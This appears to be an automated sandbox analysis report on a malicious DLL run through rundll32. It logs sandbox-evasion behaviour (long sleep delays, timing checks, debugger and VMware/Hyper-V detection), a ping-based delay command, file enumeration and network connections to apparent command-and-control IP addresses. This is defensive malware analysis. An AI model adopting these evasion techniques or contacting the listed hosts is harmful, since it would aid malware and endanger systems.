Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Windows\SysWOW64\rundll32.exe Evasive API call chain: CreateMutex,DecisionNodes,Sleep graph_3-17279
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_1001E1FE rdtsc 3_2_1001E1FE
Source: C:\Windows\SysWOW64\rundll32.exe Thread delayed: delay time: 1800000
Source: C:\Windows\SysWOW64\rundll32.exe Thread delayed: delay time: 600000
Source: C:\Windows\SysWOW64\rundll32.exe Thread delayed: delay time: 180000
Source: C:\Windows\SysWOW64\rundll32.exe Thread delayed: delay time: 300000
Source: C:\Windows\SysWOW64\rundll32.exe Thread delayed: delay time: 3600000
Source: C:\Windows\SysWOW64\rundll32.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\rundll32.exe Window / User API: threadDelayed 537
Source: C:\Windows\SysWOW64\rundll32.exe Window / User API: threadDelayed 4495
Source: C:\Windows\SysWOW64\rundll32.exe TID: 6696 Thread sleep count: 236 > 30
Source: C:\Windows\SysWOW64\rundll32.exe TID: 6696 Thread sleep time: -2360000s >= -30000s
Source: C:\Windows\SysWOW64\rundll32.exe TID: 6752 Thread sleep count: 537 > 30
Source: C:\Windows\SysWOW64\rundll32.exe TID: 6752 Thread sleep time: -966600000s >= -30000s
Source: C:\Windows\SysWOW64\rundll32.exe TID: 5372 Thread sleep time: -1800000s >= -30000s
Source: C:\Windows\SysWOW64\rundll32.exe TID: 5624 Thread sleep time: -4200000s >= -30000s
Source: C:\Windows\SysWOW64\rundll32.exe TID: 5652 Thread sleep count: 53 > 30
Source: C:\Windows\SysWOW64\rundll32.exe TID: 4288 Thread sleep time: -600000s >= -30000s
Source: C:\Windows\SysWOW64\rundll32.exe TID: 6604 Thread sleep time: -2340000s >= -30000s
Source: C:\Windows\SysWOW64\rundll32.exe TID: 6204 Thread sleep time: -4800000s >= -30000s
Source: C:\Windows\SysWOW64\rundll32.exe TID: 4336 Thread sleep time: -4200000s >= -30000s
Source: C:\Windows\SysWOW64\rundll32.exe TID: 6304 Thread sleep time: -10800000s >= -30000s
Source: C:\Windows\SysWOW64\rundll32.exe TID: 6752 Thread sleep count: 4495 > 30
Source: C:\Windows\SysWOW64\rundll32.exe TID: 6752 Thread sleep time: -8091000000s >= -30000s
Source: C:\Windows\SysWOW64\rundll32.exe TID: 4288 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\PING.EXE Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_10007F3E FindFirstFileA,FindNextFileA,Sleep,FindClose,3_2_10007F3E
Source: C:\Windows\System32\loaddll32.exe Thread delayed: delay time: 120000
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\
Source: Amcache.hve.13.dr Binary or memory string: VMware
Source: rundll32.exe, 00000003.00000002.4627377424.000000000019B000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: s\Applications\\VMwareHo
Source: Amcache.hve.13.dr Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.13.dr Binary or memory string: vmci.syshbin
Source: Amcache.hve.13.dr Binary or memory string: VMware, Inc.
Source: Amcache.hve.13.dr Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.13.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.13.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.13.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: rundll32.exe, 00000003.00000002.4627673780.000000000270A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.4627673780.00000000026BE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: Amcache.hve.13.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.13.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.13.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.13.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: rundll32.exe, 00000003.00000003.4418891128.000000000276E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: c:\Windows\System32\DriverStore\FileRepository\vmci.inf_amd64_68ed49469341f563\*.*`Yq
Source: Amcache.hve.13.dr Binary or memory string: vmci.sys
Source: Amcache.hve.13.dr Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.13.dr Binary or memory string: vmci.syshbin`
Source: Amcache.hve.13.dr Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.13.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.13.dr Binary or memory string: VMware20,1
Source: Amcache.hve.13.dr Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.13.dr Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.13.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.13.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.13.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.13.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.13.dr Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.13.dr Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.13.dr Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.13.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: rundll32.exe, 00000003.00000002.4628180848.00000000042EC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Applications\\VMwareHostOpen.exe
Source: rundll32.exe, 00000003.00000003.2475810862.00000000004C7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Ly\Machine\Software\Classes\Applications\\VMwareHostOpen.exes\Applications\\VMwareHostOpen.exeion\\Run\User Shell Foldersockdown_Zones\4
Source: Amcache.hve.13.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: C:\Windows\SysWOW64\rundll32.exe Process queried: DebugPort

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 107.163.56.110 18530
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 107.160.131.253 18659
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 107.160.131.254 23588
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 116.133.8.92 80
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\QCTYoyX422.dll",#1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\rundll32.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
